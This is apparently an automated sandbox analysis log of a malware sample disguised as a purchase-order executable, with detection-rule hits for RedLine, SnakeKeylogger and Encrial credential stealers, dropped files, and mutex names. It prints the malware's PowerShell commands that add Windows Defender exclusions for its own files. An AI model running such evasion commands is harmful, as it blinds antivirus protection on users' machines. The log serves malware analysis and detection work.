Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_0645DAAC	35_2_0645DAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_06451B94	35_2_06451B94
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_0645E608	35_2_0645E608
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_0645255F	35_2_0645255F
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_064525A8	35_2_064525A8
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_064525B8	35_2_064525B8
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_06454174	35_2_06454174
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_06451D20	35_2_06451D20
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_06451B2A	35_2_06451B2A
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_06451B88	35_2_06451B88
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 35_2_064C3419	35_2_064C3419

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Code function: String function: 0040E1D8 appears 43 times

Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1799932026.0000000009BE9000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1741498534.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1776515513.00000000075F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1748194036.000000000434A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000000.1691065458.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefCIh.exe2 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe	Binary or memory string: OriginalFilename vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1775030624.0000000003A19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclrjit.dllT vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1775030624.0000000003A19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1775030624.0000000003A19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1775030624.0000000003A19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameStub.exe* vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1798563262.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCloudServices.exe< vs PO_2024_056209_MQ04865_ENQ_1045.exe
Source: PO_2024_056209_MQ04865_ENQ_1045.exe	Binary or memory string: OriginalFilenamefCIh.exe2 vs PO_2024_056209_MQ04865_ENQ_1045.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.zeXKjViL.exe.41ea2c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.zeXKjViL.exe.40802a8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.zeXKjViL.exe.40802a8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: armsvc.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: armsvc.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.8.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: PO_2024_056209_MQ04865_ENQ_1045.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: zeXKjViL.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Microsofts.exe.8.dr, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Microsofts.exe.8.dr, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@38/153@40/18

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Code function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

8_2_004019F0

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

8_2_004019F0

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Code function: 8_2_02BFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

8_2_02BFCBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

File created: C:\Users\user\AppData\Roaming\zeXKjViL.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a5f0bea56967b89b7d8e3ee9-b
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a5f0bea56967b89b9ea72c54-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a5f0bea56967b89b-inf
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Users\user\AppData\Roaming\zeXKjViL.exe	Mutant created: \Sessions\1\BaseNamedObjects\IfUvYyLQB

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

File created: C:\Users\user\AppData\Local\Temp\tmp29D3.tmp

Jump to behavior

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Microsofts.exe, 00000013.00000002.2962626553.000000000260C000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000013.00000002.2962626553.00000000025FE000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

ReversingLabs: Detection: 42%

Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

File read: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zeXKjViL.exe"
